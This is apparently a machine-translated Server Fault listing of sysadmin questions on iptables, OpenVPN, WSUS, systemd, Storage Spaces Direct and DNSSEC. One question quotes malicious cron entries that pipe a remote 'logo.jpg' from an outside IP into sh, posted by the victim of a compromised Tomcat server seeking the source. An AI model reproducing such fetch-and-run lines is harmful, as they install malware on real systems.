服务器管理员

系统和网络管理员的问答


4
Linux iptables被拒绝-如何重新启用它?
所以我的网络中有一个客户端通过我的计算机通过arpspoof连接到路由器。当我知道要停止数据包转发时,我执行: iptables -A FORWARD -j REJECT 这是我所期望的。但是当我尝试做类似的事情时: iptables -A FORWARD -j ACCEPT 我无法像一开始那样设法使数据包通过。 我在做错什么吗?还是应该使用与“接受”不同的其他论点?

1
为什么OpenVPN中的客户端静态IP分配失败?
我正在运行OpenVPN服务器,并且想为特定的客户端分配静态IP。 这是我的server.conf。我认为这会将虚拟IP池配置为从10.5.24.209到10.5.24.223。 port 443 proto tcp dev tun sndbuf 0 rcvbuf 0 ca ca.crt cert server.crt key server.key dh dh.pem auth SHA512 tls-auth ta.key 0 topology subnet server 10.5.24.208 255.255.255.240 #This netmask should span IPs .208-.223. ifconfig-pool-persist ipp.txt push "redirect-gateway def1 bypass-dhcp" push "dhcp-option DNS 168.xx.xx.xx" keepalive 10 120 cipher …
8 ip  subnet  openvpn 


1
是否可以设置不需要预同步的Windows Update缓存?
我在VM实验室中有一堆Windows服务器和客户端,我想简化更新管理。当前,我需要在每台计算机上运行Windows Update,下载更新。 我知道使用WSUS,我可以创建一个中央缓存,但是似乎必须事先选择更新。对于Windows 2012 R2、2016、10和8.1来说,这似乎是250GB的下载量。另外,如果我想要Office,SharePoint或SQL Server,则也必须下载它们。 我真正要寻找的是基本上按原样在每台计算机上运行Windows Update(包括Office,SQL Server等其他Microsoft产品的更新),但是只要发现新软件包,就对其进行缓存。因此,当其他计算机需要它时,他们只会从缓存中获取它。 这样,如果我决定在计算机上安装Office 2013,那么我不想返回WSUS,请选择Office 2013,进行同步。但是,我只是想在该目标计算机上运行Windows Update,看到它需要针对Office 2013进行大量更新,下载,缓存它们,然后像​​这样的下一台计算机从缓存中获取它们。 那可能吗?使用WSUS或类似的其他软件。我不在乎是否需要批准升级,我并不是真正在寻找更新管理,只是为了缓存。
8 windows  wsus 

1
无法删除Linux目录-无限递归
我们在支持我们的版本控制服务器的RHEL6 VM上安装了NFS-最近,其中一个存储库变得有些疯狂,这是我在服务器上找到的: ls -latri repo.git/refs/heads/ total 28 5551210 drwxr-xr-x. 2 git git 8192 Jun 1 21:21 . 5551210 drwxr-xr-x. 2 git git 8192 Jun 1 21:21 5551210 drwxr-xr-x. 2 git git 8192 Jun 1 21:21 5551209 drwxr-xr-x. 3 git git 4096 Jun 1 22:09 .. 当我tree对目录运行时,它似乎是无限递归的-例如: repo.git/refs/heads/ ├── │ ├── …
8 linux  redhat  nfs 

6
如何远程观看终端窗口?
我离开办公室之前有一个活动的终端窗口,该窗口在Centos 7服务器上运行脚本。现在我已经从家里进行SSH了,我想知道它的去向。这可能吗?我可以从这里重新加入同一终端窗口吗?

3
通过未知来源的cron对Apache服务器进行Shell脚本攻击
在Apache tomcat服务器上运行项目大战时,我发现该服务器已受到威胁。 在对未知分子进行战争时,cron像这样 [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh 下载的文件logo.jpg带有正在下载恶意软件的外壳程序脚本。 我在下面的这个网站上发现了类似的问题 https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ 和 /security/160068/kworker34-malware-on-linux 我无法在整个代码中找到此cron调度程序的来源。 我想知道有人遇到过这个问题吗?以及如何在代码中查找调度程序的来源。 注意: 我正在研究JAVA(Struts 2)+ jsp + javascript + jquery Web项目。 每次我使用项目的war文件启动tomcat时,都会运行此调度程序,但是我无法在代码中找到任何用于调度程序的调度程序。 我在日志文件中找到了以下行 [INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - …

2
有什么方法可以防止Storage Spaces Direct自动添加磁盘?
在托管使用存储空间直通(S2D)的SQL故障转移群集实例(FCI)的2016 Windows服务器故障转移群集(WSFC)上遇到问题。在每台服务器上,成功地进行初始创建后,S2D会自动向存储池添加一个本来没有使用的RAID卷(尽管无法在RAID卷上创建S2D,并且绝对坚持使用未经检查的磁盘)。现在它坏了,因为-据我所知-正是这样。结果,虚拟磁盘处于脱机状态,从而导致整个群集崩溃。由于缺少群集网络资源,它不会重新联机。有问题的磁盘可以退出,但不能删除。虚拟磁盘修复未运行,群集兼容性测试声称配置无效。 这是一个新设置。因此,我可以简单地删除虚拟磁盘,群集甚至服务器,然后重新开始。但是,在我们提高工作效率之前,我需要确保,再也不会发生这种情况。仅通过不必要地和错误地添加不受支持的磁盘,系统就无法在虚拟膝盖中崩溃,这是我们无法部署的平台。因此,首先,我需要一种方法来防止这种情况的发生,而不是立即进行修复。我的猜测是,防止S2D设置获取的磁盘数量超过创建时的数量,就可以解决问题。在实际磁盘更换期间,可能需要更多手动交互的成本对于集群来说可以忽略不计...我们在这里。但是,到目前为止我浏览了许多文档,但找不到任何方法来控制它。除非我缺少任何东西,否则Set-StoragePool都不会, 任何帮助或提示将不胜感激。 以下是有关上述内容的更多详细信息:我们有2台HPE DL380 Gen9服务器计算机,它们通过支持RDMA的10GB以太网和通过1GB的客户端网络进行了双连接。每个功能都有一个RAID控制器HP ??? 和一个简单的HBA控制器HP ??? (因为S2D绝对需要并且只能在直接连接的未入侵磁盘上使用)。存储配置包括RAID控制器上的OS-RAID,RAID控制器上的Files-RAID,以及HBA上用于S2D的一组直接连接的磁盘。 我在OS-RAID上设置了2个Windows Servers 2016数据中心版本,安装了WSFC功能,运行并通过了包括S2D选项的群集兼容性测试,创建了不带存储的群集,添加了文件共享见证(在单独的计算机上),启用了S2D在存储池中,该存储池自动包括所有未入侵的磁盘,并在该池的顶部创建了镜像类型的虚拟磁盘,并将NTFS用作文件系统,因为它应该是SQL FCI的首选FS安装。 然后,我在该群集上将SQL 2016标准版安装为FCI,导入了数据库并对其进行了全部测试。一切都很好。数据库在那里,而且比以往任何时候都快。强制以及自动故障转移都很容易。一切看起来都很好。 第二天,我们尝试使用剩余的Files-RAID。第一件事是更改RAID级别,因为我们不喜欢预配置。删除预配置的RAID卷并在每个服务器上构建一个新的RAID卷后不久,我们检测到群集已关闭。到目前为止,据我所知,预先配置的Files-RAID卷已自动添加到池中,而正如我们刚刚删除的那样,它现在从池中丢失了。在检查时,我发现了新的Files-RAID,尽管仍在创建中,但也已显示为池的物理驱动器。因此,该池现在在每台服务器上都包含2个RAID卷,其中一个甚至都不存在。Get-PhysicalDisk将这些卷(而不是它们的磁盘)与HBA上的实际物理磁盘一起列出,不确定是否正常。 我能够淘汰这些物理磁盘(即实际上是RAID卷的磁盘),现在将它们标记为已淘汰。但是它们仍然在池中,我暂时无法删除它们,尝试这样做失败。Repair-VirtualDisk应该仅在其余磁盘上将虚拟磁盘重建到正确的状态(我经过的是:https : //social.technet.microsoft.com/Forums/windows/en-US/dbbf317b-80d2-4992- b5a9-20b83526a9c2 / storage-spaces-remove-physical-disk?forum = winserver8gen),但是这项工作很快就结束了,“成功”了,当然没有任何效果。 尝试将虚拟磁盘切换回联机失败,表明网络群集资源不可用。据我了解,这只能指(可用的)存储池,因为丢失的磁盘不是群集资源。该池显示无错误可修复。运行群集兼容性测试会声明不适合群集的配置。 我找不到剩下的任何地方可以弹动另外一英寸,整个事情永远都陷入僵局。关于如何防止正在运行的WSFC那样出现的任何想法? 我没有遇到任何启发性的错误消息,并且我也不想通过发布所有错误消息来进一步轰炸该页面。如果有人想提供任何具体细节,请告诉我。 谢谢您的宝贵时间,伙计们! 卡斯滕 根据Raspberry先生的要求进行更新

1
如何从域中删除DNSSEC支持?
一个组织对其域具有DNSSEC支持。它们具有运行的BIND9作为权威名称服务器,该服务器还管理密钥。但是,决定删除DNSSEC。卸下其中的关键资料/var/lib/bind/pri并重新启动服务器是否足够?是否应该执行一些步骤来将其卸下?
8 debian  bind  dnssec 


2
这些DNS设置是一个好主意吗?
我们有一个非常小的网络(5个工作站),其中一个Windows Server充当域控制器,DHCP和DNS服务器。所有设备都连接到标准交换机,而标准交换机又连接到标准宽带调制解调器。 每个工作站的TCP网络设置为: 192.168.0.50是DNS服务器的IP。 192.168.0.1是调制解调器网关的IP 8.8.8.8是Google的公共DNS服务器 这是一个好计划吗?列表中是否包括调制解调器的IP?我注意到Windows DNS服务器正在接收和缓存对公共网站的请求。Google DNS服务器应该在列表的上方吗?

4
将Ubuntu Server 17.04加入Windows AD:同样是vs Centrify,Winbind和SSSD
我有很多Ubuntu Server 17.04主机,必须将它们加入现有的Windows AD域(Windows Server 2016)。我以前从未做过,但是我知道实现此目的的几种方法,例如:同样,Centrify,SSSD和Winbind。 您能否分享您的一般经验,并告诉您这些解决方案的可靠性,易配置性/维护性如何? 如果您可以共享包含该主题的最新文章/手册的链接,那也很好,因为我只能找到三到五岁的孩子,而他们实际上并没有达到预期的效果。 非常感谢您的协助!

1
是否可以覆盖systemd单位文件来创建模板单位文件?
我知道systemd提供了一种出色的机制来覆盖程序包提供的单元文件,以影响服务配置/行为。通常使用以下命令完成此操作 sudo systemctl edit <unitfile> 在创建一个覆盖conf文件 /etc/systemd/system/<unitfile.d>/ Systemd还提供了一种单独的机制来定义模板单元文件,并将其实例化以在运行时创建实例特定的单元。这需要将模板文件命名为 <servicename>@.service 然后实例化为 systemctl start <servicename>@<instancename> 现在,我遇到了一种情况,我想将包提供的服务作为多个单元实例运行。我想避免创建自己的模板单元文件,因此我尝试查看是否可以重写软件包提供的单元文件来创建模板单元文件。 根据我的理解,由于模板单位文件的命名约定与常规单位文件不同,因此我认为无法通过将模板文件放在/ etc / systemd / system中来覆盖软件包提供的单位文件。 有什么明确的方法可以实现我的目标吗? 特定方案:grafana软件包安装grafana-server.service单位文件。我想在我的机器上运行grafana的两个实例-DEV和STG分别一个。我已经能够做到这一点: 修改grafana-server.service文件(使用%I设置文件夹位置和文件路径) 将修改后的grafana-server.service重命名为grafana-server @ .service 使用以下命令启动grafana实例: sudo systemctl start grafana-server@dev 和 sudo systemctl start grafana-server@stg 但是,这断开了grafana提供的服务单元文件的链接,并且如果它们在我升级时增强了服务文件,则需要再次重做此活动。我的目标是避免这种直接依赖性,而是将其转换为替代依赖性。 有什么想法吗?
8 linux  systemd 

1
从vSphere 5.5迁移到另一个数据中心6.5
我们计划将生产VM从基于ESXi 5.5主机的一个数据中心迁移到具有6.5环境的新数据中心。数据中心位于不同的位置。 因此,我们的生产包括近150个VM。我已经设置了网络连接,并尝试使用VMware Converter传输几个测试VM,但是迁移性能并不理想。由于无法访问数据中心之间的网络,因此无法设置复制。我们没有任何人可以执行此操作,导致维护数据中心的人员离开了公司,我需要自己做。 还有其他迁移方法吗?从5.5迁移到6.5是否也有一些限制?

By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.